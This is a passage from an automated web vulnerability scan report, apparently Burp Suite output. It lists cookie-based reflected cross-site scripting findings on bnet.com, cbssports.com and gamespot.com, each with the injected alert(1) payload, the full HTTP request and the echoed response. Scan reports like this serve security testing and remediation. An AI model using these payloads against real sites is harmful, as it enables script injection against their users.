Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /management?tag=hdr-management HTTP/1.1
Host: www.bnet.com
Proxy-Connection: keep-alive
Referer: http://www.bnet.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; __qca=P0-1524123015-1303946493098; AxData=; Axxd=1; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs2294b</script><script>alert(1)</script>315da78a2cf; MAD_FIRSTPAGE=0; reg-overlay=1; __csref=; __cst=8ba060fac4a1daa4; __csv=6522d442e56f04a6|0; __csnv=31922dab8de41511; __ctl=6522d442e56f04a61; __utmz=265262096.1303947390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=265262096.1982425901.1303947390.1303947390.1303947390.1; __utmc=265262096; __utmb=265262096.1.10.1303947390; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:41:49 GMT
Server: Apache
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 117583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
ipt'); cs.type = 'text/javascript'; cs.async = true;
cs.src = ('https:' == document.location.protocol?'https://':'http://')+'static.crowdscience.com/start-c2e7cdddce.js?cp0=[Cg8JIk24ijttAAAASDs2294b</script><script>alert(1)</script>315da78a2cf]&cp1=[-AomCQoPOVQAAFrohDcAAAAF]';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(cs,s);
})();
</script>
...[SNIP]...

3.855. http://www.cbssports.com/ [sjxBeta cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/

Issue detail

The value of the sjxBeta cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 852d3"%3balert(1)//de676d7acc8 was submitted in the sjxBeta cookie. This input was echoed as 852d3";alert(1)//de676d7acc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn852d3"%3balert(1)//de676d7acc8; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; last_access=1303946325; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:36:52 GMT
Server: Apache
Set-Cookie: last_access=1303947412; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:36:52 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 132821

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sports - CBSSports.com Sports News
...[SNIP]...
<script type="text/javascript">
//var sjxLastClick = 0;
// Unhide the content if necessary
if (("sysOn852d3";alert(1)//de676d7acc8" == "sysOn" ||
"sysOn852d3";alert(1)//de676d7acc8" == "userOn" ||
readCookie("sjxBeta") == "userOn" ||
readCookie("sjxBeta") == "sysOn")
&& !window.location.hash.match("#!") ) {

...[SNIP]...

3.856. http://www.cbssports.com/ [sjxBeta cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/

Issue detail

The value of the sjxBeta cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22c9f'%3balert(1)//e9e44b43e was submitted in the sjxBeta cookie. This input was echoed as 22c9f';alert(1)//e9e44b43e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn22c9f'%3balert(1)//e9e44b43e; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; surround=f|1; last_access=1303946325; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":2,"to":5,"c":"http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka","lc":{"d1":{"v":2,"s":false}},"cd":1,"sd":1,"f":1303946335587}

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:36:53 GMT
Server: Apache
Set-Cookie: last_access=1303947413; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:36:53 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 132811

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sports - CBSSports.com Sports News
...[SNIP]...
'1',
ptid: '2000',
ctype: 'pj;vd;arn;ev;sl;ft',
cval: 'media;spln;other;reg;free;home',
ursuid: '',
pguid: 'TbiolQq0GW4AAE4rKSs' ,
testname: 'scrapjax',
testgroup: 'sysOn22c9f';alert(1)//e9e44b43e',
testversion: 'p1'
}
DW.clear();

if ( typeof(cbsiAdBehavioralSetup) != 'undefined' ) cbsiAdBehavioralSetup();
if ( typeof(cbsiAdBehavioral) != 'undefined' ) cbsiAdBehavioral();

DW.Exter
...[SNIP]...

3.857. http://www.cbssports.com/tennis [sjxBeta cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/tennis

Issue detail

The value of the sjxBeta cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91ac7'%3balert(1)//56fe8d2780a was submitted in the sjxBeta cookie. This input was echoed as 91ac7';alert(1)//56fe8d2780a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /tennis HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn91ac7'%3balert(1)//56fe8d2780a; MADTEST=1; mad_rsi_segs=; XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:17:25 GMT
Server: Apache
Set-Cookie: last_access=1303946245; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:17:25 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 91720

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Tennis - CBSSports.com Scoreboard,
...[SNIP]...
08',
ptid: '2001',
ctype: 'pj;vd;arn;ev;sl;ft',
cval: 'media;spln;tennis;reg;free;home',
ursuid: '',
pguid: 'TbikBQq0GW4AAGCHOHk' ,
testname: 'scrapjax',
testgroup: 'sysOn91ac7';alert(1)//56fe8d2780a',
testversion: 'p1'
}
DW.clear();

if ( typeof(cbsiAdBehavioralSetup) != 'undefined' ) cbsiAdBehavioralSetup();
if ( typeof(cbsiAdBehavioral) != 'undefined' ) cbsiAdBehavioral();

DW.Exter
...[SNIP]...

3.858. http://www.cbssports.com/tennis [sjxBeta cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/tennis

Issue detail

The value of the sjxBeta cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbc6c"%3balert(1)//3fdc4edf7a3 was submitted in the sjxBeta cookie. This input was echoed as dbc6c";alert(1)//3fdc4edf7a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /tennis HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOndbc6c"%3balert(1)//3fdc4edf7a3; MADTEST=1; mad_rsi_segs=; XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:17:25 GMT
Server: Apache
Set-Cookie: last_access=1303946245; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:17:25 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 91720

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Tennis - CBSSports.com Scoreboard,
...[SNIP]...
<script type="text/javascript">
//var sjxLastClick = 0;
// Unhide the content if necessary
if (("sysOndbc6c";alert(1)//3fdc4edf7a3" == "sysOn" ||
"sysOndbc6c";alert(1)//3fdc4edf7a3" == "userOn" ||
readCookie("sjxBeta") == "userOn" ||
readCookie("sjxBeta") == "sysOn")
&& !window.location.hash.match("#!") ) {

...[SNIP]...

3.859. http://www.cbssports.com/tennis/players/playerpage/566165 [sjxBeta cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/tennis/players/playerpage/566165

Issue detail

The value of the sjxBeta cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d86c5"%3balert(1)//82d550e4e1f was submitted in the sjxBeta cookie. This input was echoed as d86c5";alert(1)//82d550e4e1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /tennis/players/playerpage/566165 HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOnd86c5"%3balert(1)//82d550e4e1f; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:27 GMT
Server: Apache
Set-Cookie: last_access=1303946367; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:27 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 114811

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Victoria Azarenka, WTA - Tennis -
...[SNIP]...
<script type="text/javascript">
//var sjxLastClick = 0;
// Unhide the content if necessary
if (("sysOnd86c5";alert(1)//82d550e4e1f" == "sysOn" ||
"sysOnd86c5";alert(1)//82d550e4e1f" == "userOn" ||
readCookie("sjxBeta") == "userOn" ||
readCookie("sjxBeta") == "sysOn")
&& !window.location.hash.match("#!") ) {

...[SNIP]...

3.860. http://www.cbssports.com/tennis/players/playerpage/566165 [sjxBeta cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/tennis/players/playerpage/566165

Issue detail

The value of the sjxBeta cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 339c1'%3balert(1)//fb45388906e was submitted in the sjxBeta cookie. This input was echoed as 339c1';alert(1)//fb45388906e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /tennis/players/playerpage/566165 HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn339c1'%3balert(1)//fb45388906e; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:30 GMT
Server: Apache
Set-Cookie: last_access=1303946370; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:30 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 114810

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Victoria Azarenka, WTA - Tennis -
...[SNIP]...
;sl;ft',
cval: 'media;spln;tennis;reg;free;playerprofiles',
asid: '566165',
astid: '48',
ursuid: '',
pguid: 'Tbikggq0GW4AAAYreq8' ,
testname: 'scrapjax',
testgroup: 'sysOn339c1';alert(1)//fb45388906e',
testversion: 'p1'
}
DW.clear();

if ( typeof(cbsiAdBehavioralSetup) != 'undefined' ) cbsiAdBehavioralSetup();
if ( typeof(cbsiAdBehavioral) != 'undefined' ) cbsiAdBehavioral();

DW.Exter
...[SNIP]...

3.861. http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [sjxBeta cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/tennis/players/playerpage/566165/2011/victoria-azarenka

Issue detail

The value of the sjxBeta cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f82ad"%3balert(1)//34ff1e7d06e was submitted in the sjxBeta cookie. This input was echoed as f82ad";alert(1)//34ff1e7d06e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /tennis/players/playerpage/566165/2011/victoria-azarenka HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOnf82ad"%3balert(1)//34ff1e7d06e; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:30 GMT
Server: Apache
Set-Cookie: last_access=1303946370; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:30 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 114810

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Victoria Azarenka, WTA - Tennis -
...[SNIP]...
<script type="text/javascript">
//var sjxLastClick = 0;
// Unhide the content if necessary
if (("sysOnf82ad";alert(1)//34ff1e7d06e" == "sysOn" ||
"sysOnf82ad";alert(1)//34ff1e7d06e" == "userOn" ||
readCookie("sjxBeta") == "userOn" ||
readCookie("sjxBeta") == "sysOn")
&& !window.location.hash.match("#!") ) {

...[SNIP]...

3.862. http://www.cbssports.com/tennis/players/playerpage/566165/2011/victoria-azarenka [sjxBeta cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbssports.com
Path:	/tennis/players/playerpage/566165/2011/victoria-azarenka

Issue detail

The value of the sjxBeta cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c86d'%3balert(1)//e5117e68d7b was submitted in the sjxBeta cookie. This input was echoed as 5c86d';alert(1)//e5117e68d7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /tennis/players/playerpage/566165/2011/victoria-azarenka HTTP/1.1
Host: www.cbssports.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/tennis
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid=S:1:75a131af77f368177c305b76043e5841d4355a86d64d9299; sjxBeta=sysOn5c86d'%3balert(1)//e5117e68d7b; MADTEST=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; last_access=1303946239; surround=f|1; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; fsr.s={"v":1,"rid":"1303946257486_383429","cp":{"fantasynews":"no","pop":"now"},"pv":1,"to":3,"c":"http://www.cbssports.com/tennis","lc":{"d1":{"v":1,"s":false}},"cd":1,"sd":1}

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:31 GMT
Server: Apache
Set-Cookie: last_access=1303946371; domain=.cbssports.com; path=/
Cache-Control: max-age=0
Expires: Wed, 27 Apr 2011 23:19:31 GMT
P3P: CP="CAO DSP COR PSA PSD IVD CONi OUR IND" policyref="/w3c/p3p.xml"
Content-Type: text/html
Via: 1.1 www.cbssports.com
X-Media: ws1710-fe.tm.cbsig.net:30000
Connection: close
Content-Length: 114809

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Victoria Azarenka, WTA - Tennis -
...[SNIP]...
;sl;ft',
cval: 'media;spln;tennis;reg;free;playerprofiles',
asid: '566165',
astid: '48',
ursuid: '',
pguid: 'Tbikgwq0GW4AAAJtcZE' ,
testname: 'scrapjax',
testgroup: 'sysOn5c86d';alert(1)//e5117e68d7b',
testversion: 'p1'
}
DW.clear();

if ( typeof(cbsiAdBehavioralSetup) != 'undefined' ) cbsiAdBehavioralSetup();
if ( typeof(cbsiAdBehavioral) != 'undefined' ) cbsiAdBehavioral();

DW.Exter
...[SNIP]...

3.863. http://www.gamespot.com/games.html [XCLGFbrowser cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamespot.com
Path:	/games.html

Issue detail

The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c240b"><script>alert(1)</script>2adf0912472 was submitted in the XCLGFbrowser cookie. This input was echoed as c240b\"><script>alert(1)</script>2adf0912472 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /games.html?type=top_rated&mode=top&page_type=games&om_act=convert&om_clk=subnav&tag=subnav%3Btop_games HTTP/1.1
Host: www.gamespot.com
Proxy-Connection: keep-alive
Referer: http://www.gamespot.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
